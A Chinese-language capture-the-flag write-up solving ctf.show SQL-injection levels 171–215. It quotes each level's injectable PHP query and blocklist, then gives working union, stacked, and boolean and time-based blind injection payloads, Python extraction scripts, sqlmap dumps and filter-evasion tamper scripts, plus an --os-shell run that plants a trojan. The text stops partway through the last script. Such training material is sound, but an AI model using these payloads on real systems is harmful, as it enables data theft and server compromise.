SQL注入_CTF Show

171

要点：使用 or true 绕过 where 后的条件约束（MySQL中非零数字可代表true）

$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

0' or true%23
0' or '1

需要自己把#编码为%23

172

$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//返回逻辑：检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }

0' union select 1,group_concat(password)from ctfshow_user2 where username="flag"%23

173

要点：编码绕过返回内容过滤 hex() to_base64()

$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//返回逻辑：检查结果是否有flag
	if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

1' union select 1,2,hex(group_concat(password))from ctfshow_user3 where username="flag"%23

174

要点：编码 替换

$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//返回逻辑：检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

to_base64()编码后，用replace()将数字替换为字母
replace(object,search,replace)

175

要点：将查询结果写入文档然后访问

$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//返回逻辑：检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

1' union select 1,password from ctfshow_user5 into outfile "/var/www/html/1.txt"%23
#然后访问url/1.txt

176

$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单，不宜展示
  }

#union、select绕过，详见 MySQL绕过.md

177~179

同上

过滤空格

180

同上

#过滤了注释符和空格
0'||username='flag

181

要点：and or

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
  }
      

#注意limit 1，需要前面id=''搜索不到内容，然后搜索后面username='flag'得到想要的内容，and'1用于闭合单引号（不能or '1 ，使用or '1 从所有数据中返回第一条）
'or(username='flag')and'1
'||(username)='flag

182

要点：模糊查询(like regexp)

select * from tb1 where name regexp'a';

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }

0'||(id)='26

'||(password)regexp'{		#正则匹配{
'||(password)like'%{%	

183

要点：盲注，使用like或者regexp

//拼接sql语句查找指定ID用户
  $sql = "select count(pass) from ".$_POST['tableName'].";";

//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
  }

import requests

url='http://aefd8cad-6684-46a7-89d3-daeb81f816af.challenge.ctf.show/select-waf.php'

flag="ctfshow{"
for i in range(0,100):
    for j in "{0123456789abcdefghijklmnopqrstuvwxyz-}":
        data={
            'tableName':"(ctfshow_user)where(pass)like'{}%'".format(flag+j)
        }
        r=requests.post(url=url,data=data).text
        if "$user_count = 1" in r:
            flag += j
            print(flag)
            if j=='}':
                exit()
            break

184

#原理 使用join绕过对where的过滤
select * from tb1 as a join tb1 as b on (b.title regexp concat(char(97),char(97)));

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
  
  //对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

import requests

url = 'http://9868e30a-0e18-44f9-ae7c-31598a569b9a.challenge.ctf.show/select-waf.php'
dic = '{0123456789abcdefghijklmnopqrstuvwxyz-}'
flag = 'ctfshow{'

def switchToChar(str):
    ret = 'concat('
    for i in range(len(str)):
        ret += f'char({ord(str[i])})'
        if i != len(str)-1:
            ret += ','
        else:
            ret += ')'
    return ret

def getPayload(c):
    payload = {
        'tableName':f'ctfshow_user as a join ctfshow_user as b on (b.pass regexp {switchToChar(flag+c)})'
    }
    return payload

for i in range(50):
    print(f'第{i}轮')
    for c in dic:
        payload = getPayload(c)
        # print(payload)
        rep = requests.post(url,payload)
        if '$user_count = 0;' in rep.text:
            continue
        else:
            flag += c
            print(flag)
            if c == '}':
                exit(123)
            break

185-186

要点：通过弱类型或者产生数字的函数绕过对数字的过滤

false	0
true	1
pi()	3.14……
ceil()
floor()
version()	甚至可以用上version……
count()		甚至count……	select * from tb1 where id=(select count(id) from tb1);

mysql> select * from tb1 where id=true+true;
+----+------+------+-------+
| id | name | age  | score |
+----+------+------+-------+
|  2 | wsx  | NULL |  NULL |
+----+------+------+-------+

mysql> select * from tb1 where id=floor(pi());
+----+------+------+-------+
| id | name | age  | score |
+----+------+------+-------+
|  3 | edc  | NULL |  NULL |
+----+------+------+-------+

mysql> select * from tb1 where id=(select count(id) from tb1);
+----+------+------+-------+
| id | name | age  | score |
+----+------+------+-------+
|  7 | ujm  | NULL |  NULL |
+----+------+------+-------+

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
  
  //对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\%|\<|\>|\^|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

当然这里使用 true 会更方便
修修补补又一个脚本

import requests

url = 'http://a1377eef-3929-4768-bbc6-ea6daad79005.challenge.ctf.show/select-waf.php'
dic = '{0123456789abcdefghijklmnopqrstuvwxyz-}'
flag = 'ctfshow{'

def switchToTrue(num):
    ret = ''
    for i in range(num):
        ret += 'true'
        if i != num-1:
            ret += '+'
    return ret

def switchToChar(str):
    ret = 'concat('
    for i in range(len(str)):
        ret += f'char({switchToTrue(ord(str[i]))})'
        if i != len(str)-1:
            ret += ','
        else:
            ret += ')'
    return ret

def getPayload(c):
    payload = {
        'tableName':f'ctfshow_user as a join ctfshow_user as b on (b.pass regexp {switchToChar(flag+c)})'
    }
    return payload


for i in range(50):
    print(f'第{i}轮')
    for c in dic:
        payload = getPayload(c)
        # print(payload)
        rep = requests.post(url,payload)
        if '$user_count = 0;' in rep.text:
            continue
        else:
            flag += c
            print(flag)
            if c == '}':
                exit(123)
            break

187

要点：用特定字符串绕过md5()，实现永真

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
  
  $username = $_POST['username'];
    $password = md5($_POST['password'],true);

    //只有admin可以获得flag
    if($username!='admin'){
        $ret['msg']='用户名不存在';
        die(json_encode($ret));
    }

username=admin
password=ffifdyop	或
md5('ffifdyop',true)	#输出 'or'6�]��!r,��b	实现永真绕过

188

要点：弱类型比较

 //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username}";

 //用户名检测
  if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==intval($password)){
      $ret['msg']='登陆成功';
      array_push($ret['data'], array('flag'=>$flag));
    }

在where username=0这样的查询中，因为username都会是字符串，在mysql中字符串与数字进行比较的时候，以字母开头的字符串都会转换成数字0，因此这个where可以把所有以字母开头的数据查出来。

mysql> select * from tb1 where name=0;
+----+------+------+-------+
| id | name | age  | score |
+----+------+------+-------+
|  1 | qaz  | NULL |  NULL |
|  2 | wsx  | NULL |  NULL |
|  3 | edc  | NULL |  NULL |
|  4 | rfv  | NULL |  NULL |
|  5 | tgb  | NULL |  NULL |
|  6 | yhn  | NULL |  NULL |
|  7 | ujm  | NULL |  NULL |

if($row['pass']==intval($password))
#弱类型比较，'a123'==0	注：低版本PHP中结果为true，高版本中为false
#故payload为 0 0

布尔盲注

189

 //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username}";
  
   //用户名检测
  if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

输入 0 0， 提示密码错误；输入1 0， 提示查询失败

根据这两个反馈结果，用盲注来获取文件内容

MySQL中有 a = T/F ? 1:2 这种东西

mysql> select if(0,1,2);
+-----------+
| if(0,1,2) |
+-----------+
|         2 |
+-----------+

mysql> select if(1,1,2);
+-----------+
| if(1,1,2) |
+-----------+
|         1 |
+-----------+

payload： username=if((load_file('/var/www/html/api/index.php'))regexp('ctfshow{'),0,1)&password=2
字符串匹配成功，username=0，返回\u5bc6\u7801\u9519\u8bef（密码错误）；
不成功，username=1，返回\u67e5\u8be2\u5931\u8d25（查询失败）

import requests

url = 'http://89988101-8578-48d2-8852-ef798b54c4af.challenge.ctf.show/api/'
dic = '{0123456789abcdefghijklmnopqrstuvwxyz-}'
flag = 'ctfshow{'

for i in range(50):
    print(f'第{i}轮')
    for c in dic:
        payload = f"if((load_file('/var/www/html/api/index.php'))regexp('{flag+c}'),0,1)"
        data = {
            'username':payload,
            'password':'0'
        }
        # print(payload)
        rep = requests.post(url=url,data=data)
        if '\\u5bc6\\u7801\\u9519\\u8bef' in rep.text:
            flag += c
            print(flag)
            if c=='}':
                exit(0)
            break
        elif '\\u67e5\\u8be2\\u5931\\u8d25' in rep.text:
            #不是这个字符
            continue
        else:
            print('sth wrong')
            print(rep.text)
            exit(-1)

190

//查询语句
  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";

//返回逻辑

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

  //TODO:感觉少了个啥，奇怪

// 布尔盲注
import requests
url = 'http://4ba95929-1697-41b3-aeb5-dbc9414219c4.challenge.ctf.show/api/'
data = {'username': '', 'password': 1}
flag = ''
 
for i in range(1, 46):
    first = 32
    tail = 127
    while first < tail:
        mid = (first + tail) >> 1
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload = 'select concat(f1ag) from ctfshow_fl0g'
        data['username'] = f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)=1#"
        res = requests.post(url, data=data)
        if '密码错误' in res.json()['msg']:
            first = mid + 1
        else:
            tail = mid
 
    flag = flag + chr(first)
    print(flag)

191

#相比上题过滤了ascii()，使用ord()代替
import requests
 
url = 'http://7abd7b71-5043-4600-a76b-1158125793db.challenge.ctf.show/api/'
data = {'username': '', 'password': 1}
flag = ''
 
for i in range(1, 46):
    first = 32
    tail = 127
    while first < tail:
        mid = (first + tail) >> 1
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload = 'select concat(f1ag) from ctfshow_fl0g'
        data['username'] = f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)=1#"
        res = requests.post(url, data=data)
        if '密码错误' in res.json()['msg']:
            first = mid + 1
        else:
            tail = mid
 
    flag = flag + chr(first)
    print(flag)

192

//查询语句
  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
      

//返回逻辑

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥，奇怪
    if(preg_match('/file|into|ascii|ord|hex/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

#过滤增加了ord和hex。那么可以使用正则表达式来判断
import requests
 
url = 'http://6dc4f652-352a-4f34-b25b-fb95e0b691ba.challenge.ctf.show/api/'
data = {'username': '', 'password': 1}
flag = ''
 
for i in range(1, 46):
    for j in r'1234567890qazwsxedcrfvtgbyhnujmikolp-{}':
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload = 'select concat(f1ag) from ctfshow_fl0g'
        data['username'] = f"admin' and if(substr(({payload}),{i},1)regexp('{j}'),1,2)=1#"
        res = requests.post(url, data=data)
        if '密码错误' in res.json()['msg']:
            flag = flag + j
            print(flag)

193~194

//193
if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}
//194
if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}

# substr 也给过滤了，用like去匹配
import requests
 
url = 'http://66fc1124-328e-4cf0-8493-8cc13b8f7eb0.challenge.ctf.show/api/'
data = {'username': '', 'password': 1}
flag = ''
 
for i in range(len(flag) + 1, 46):
    for j in r'flag{b7c4de-2hi1jk0mn5o3p6q8rstuvw9xyz},_':
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
        payload = 'select concat(f1ag) from ctfshow_flxg'
        data['username'] = f"admin' and if(({payload}) like '{flag + j + '%'}',1,0)#"
        # print(data['username'])
        res = requests.post(url, data=data)
        if '密码错误' in res.json()['msg']:
            flag = flag + j
            print(flag)
            break

195

if(preg_match('/|\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
	$ret['msg']='用户名非法';
	die(json_encode($ret));
}

//这道题是用的堆叠注入，堆叠注入，就是将语句堆叠在一起进行查询，使用分号将之前的语句闭合，然后再写入一条新的语句。将表中所有密码修改为1，登陆获得flag。
0;update`ctfshow_user`set`pass`=1

196

// 写着过滤了select，实际上没有，所以说到底过滤了什么还得靠自己fuzz
0;select(1)
0

197

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";

//updata 被ban了。
if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i', $username)){
	$ret['msg']='用户名非法';
	die(json_encode($ret));
}
if($row[0]==$password){
	$ret['msg']="登陆成功 flag is $flag";
}

1.使用alter指令可以修改字段 id 为 pass，修改 pass 为 id ，这样登录时查询到的就是原来的id了，然后爆破id就可以了
2.drop 和 creat 重新建立表，使得账号密码为自己设置的
3.或者直接 0;insert ctfshow_user(`username`,`pass`) value(1,2); 就能直接用1 2登录了
4.update数据

198

 //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  
 //TODO:感觉少了个啥，奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

1.使用alter指令可以修改字段 id 为 pass，修改 pass 为 id ，这样登录时查询到的就是原来的id了，然后爆破id就可以了
2.或者直接 0;insert ctfshow_user(`username`,`pass`) value(1,2); 就能直接用1 2登录了

199

//拼接sql语句查找指定ID用户
$sql = "select pass from ctfshow_user where username = {$username};";

//TODO:感觉少了个啥，奇怪,不会又双叒叕被一血了吧
if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(/i', $username)){
	$ret['msg']='用户名非法';
	die(json_encode($ret));
}

if($row[0]==$password){
	$ret['msg']="登陆成功 flag is $flag";
}

// 过滤了(
1;show tables
ctfshow_user

200

//拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};"; 

//TODO:感觉少了个啥，奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(|\,/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

1;show tables
ctfshow_user

SQLMap

201

--random-agent		#随机UA，默认UA为sqlmap
--referer=REFERER	#指定 HTTP Referer

#初步测试
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" 

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5896=5896 AND 'gQrI'='gQrI&page=1&limit=10

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3963 FROM (SELECT(SLEEP(5)))dayT) AND 'DnNy'='DnNy&page=1&limit=10

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767071,0x4b5576494253544f6e6e414475684d7946437643544946634d77536943415758694b524676595479,0x7170767171)-- -&page=1&limit=10

#库名
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" -dbs

available databases [5]:
[*] ctfshow_web
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

#当前数据库
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" --current-db

current database: 'ctfshow_web'

#表名
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" --tables -D 'ctfshow_web'

Database: ctfshow_web
[1 table]
+--------------+
| ctfshow_user |
+--------------+

#列名
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" --columns -D 'ctfshow_web' -T ctfshow_user

Database: ctfshow_web
Table: ctfshow_user
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| pass     | varchar(255) |
| username | varchar(255) |
+----------+--------------+

#数据
sqlmap -u "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/api/?id=1&page=1&limit=10" -p "id" --referer "http://fcab1f8f-60e2-4309-a696-837cc82ad38a.challenge.ctf.show/sqlmap.php" --dump -D 'ctfshow_web' -T ctfshow_user -C 'pass'

202

--data=DATA        # 使用 POST 发送数据串（例如："id=1"）

# 初步测试
sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id'

# 库名
sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' --dbs

sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' --current-db

sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' -D 'ctfshow_web' --tables

sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' -D 'ctfshow_web' -T 'ctfshow_user' --columns

sqlmap -u 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/api/' --referer 'http://e9d54465-2aad-4a3d-9543-18d9635aa7c1.challenge.ctf.show/sqlmap.php' --data 'id=1' -p 'id' -D 'ctfshow_web' -T 'ctfshow_user' -C 'pass' --dump

203

--method=METHOD     #强制使用提供的 HTTP 方法（如：--method=PUT）
sqlmap -u "http://a9c57809-71f8-47e3-8b55-cb67fc5344e1.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dump 

204

--cookie=COOKIE     #指定 HTTP Cookie（例如："PHPSESSID=a8d127e.."）
sqlmap -u 'http://d1d592d5-bd25-4cc8-a0c6-9935b9d2d955.challenge.ctf.show/api/index.php' --data="id=1" --referer=ctf.show --header="Content-Type:text/plain" --method=PUT  --cookie="PHPSESSID=8hco6t24a7b36iq3duuc8pgp3n; ctfshow=1534616240fbf803e61d298e9e761df3" --dump

205~206

--safe-req=SAFER..  设置在测试目标地址前访问的安全链接
--safe-freq=SAFE..  每次注入前前访问安全链接的次数

sqlmap -u 'http://84bad191-a27c-41b0-965d-22eacc74f655.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://84bad191-a27c-41b0-965d-22eacc74f655.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain'

207

# 使用脚本绕过对空格的拦截
sqlmap -u 'http://41151a5d-59ae-4eac-8bf1-aa61d9a87b9f.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://41151a5d-59ae-4eac-8bf1-aa61d9a87b9f.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper space2comment -v 3 --dump

208

# 绕过对 select 和 空格的过滤
sqlmap -u 'http://a2b707ac-3ac4-461c-9e5d-b79589ee27b0.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://a2b707ac-3ac4-461c-9e5d-b79589ee27b0.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper 'space2comment' -v 3 --batch --technique=B --dump

209

# 过滤了 空格 * =
sqlmap -u 'http://cbebf0b9-6373-4e62-a92b-3f88c6b89ba8.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://cbebf0b9-6373-4e62-a92b-3f88c6b89ba8.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper '209.py' -v 3 --batch

# 209.py	基于space2comment.py修改
#!/usr/bin/env python
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue
                
            elif payload[i] == "=" :
                retVal += chr(0x0a) + 'like' + chr(0x0a)
                continue

            retVal += payload[i]

    return retVal

210

//查询语句
//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;";

//返回逻辑
//对查询字符进行解密
function decode($id){
	return strrev(base64_decode(strrev(base64_decode($id))));
}

sqlmap -u 'http://e54d8397-3237-4685-878d-ad0dacd1a707.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://e54d8397-3237-4685-878d-ad0dacd1a707.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper '210.py' -v 3 --batch --dump

# 基于 base64encode.py 修改
#!/usr/bin/env python

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def reverse(x):
	y=x[::-1]
	y=list(x)
	y.reverse()
	y=''.join(y)
	return y

def tamper(payload, **kwargs):
    payload = reverse(payload)
    payload = encodeBase64(payload, binary=False)
    payload = reverse(payload)
    payload = encodeBase64(payload, binary=False)
    return payload

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
 
__priority__ = PRIORITY.LOW
 
def dependencies():
    pass
 
def tamper(payload, **kwargs):
    retVal = payload

    retVal = base64.b64encode(retVal[::-1].encode())
    retVal = base64.b64encode(retVal[::-1]).decode()
    return retVal

211

//查询语句
//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;";

//返回逻辑
//对查询字符进行解密
function decode($id){
	return strrev(base64_decode(strrev(base64_decode($id))));
}
function waf($str){
	return preg_match('/ /', $str);
}

sqlmap -u 'http://5c35d42f-c886-46d8-a9f8-31b4d9a0bc83.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://5c35d42f-c886-46d8-a9f8-31b4d9a0bc83.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper 'space2comment.py,210.py' -v 3 --batch --dump
# 注意脚本使用顺序

212

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;";

//返回逻辑
//对查询字符进行解密
function decode($id){
	return strrev(base64_decode(strrev(base64_decode($id))));
}
function waf($str){
	return preg_match('/ |\*/', $str);
}

sqlmap -u 'http://9b2248e0-e6dc-4f65-85aa-f8c9a4ed6455.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://9b2248e0-e6dc-4f65-85aa-f8c9a4ed6455.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper '209,210' -v 3 --batch --dump

213

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;";

//返回逻辑
//对查询字符进行解密
function decode($id){
	return strrev(base64_decode(strrev(base64_decode($id))));
}
function waf($str){
	return preg_match('/ |\*/', $str);
}

sqlmap -u 'http://739eab70-7d71-4452-927c-76140902a565.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://739eab70-7d71-4452-927c-76140902a565.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper '209,210'  --os-shell

which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>

do you want sqlmap to further try to provoke the full path disclosure? [Y/n]

[19:50:59] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 4

#找到路径后sqlmap会上传一个能够上传其他文件的PHP文件，进而上传木马，在根目录找到了flag

时间盲注

214

#时间盲注
import requests
 
url = 'http://fdbb6405-2a38-47ac-a0e5-f1b226d992b5.challenge.ctf.show/api/'
flag = ''
 
for i in range(1, 46):
    start = 32
    tail = 126
    while start < tail:
        mid = (start + tail) >> 1
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = 'select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx"'
        payload = 'select group_concat(flaga) from ctfshow_flagx'
        data = {
            'ip': f'if(ascii(substr(({payload}), {i}, 1))>{mid},sleep(1), 1)',
            'debug': 0
        }
        try:
            res = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            start = mid + 1
    if start != 32:
        flag += chr(start)
        print(flag)
    else:
        break

215

#相比上题需要闭合单引号
import requests
 
url = 'http://c3d0d3a1-d102-4cae-8e10-bf7afebe19c2.challenge.ctf.show/api/'
flag = ''
 
for i in range(1, 46):
    start = 32
    tail = 126
    while start < tail:
        mid = (start + tail) >> 1
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # payload = 'select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxc"'
        payload = 'select group_concat(flagaa) from ctfshow_flagxc'
        data = {
            'ip': f"' or if(ascii(substr(({payload}), {i}, 1))>{mid},sleep(1), 1) and '1'='1",
            'debug': '0'
        }
        try:
            res = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            start = mid + 1
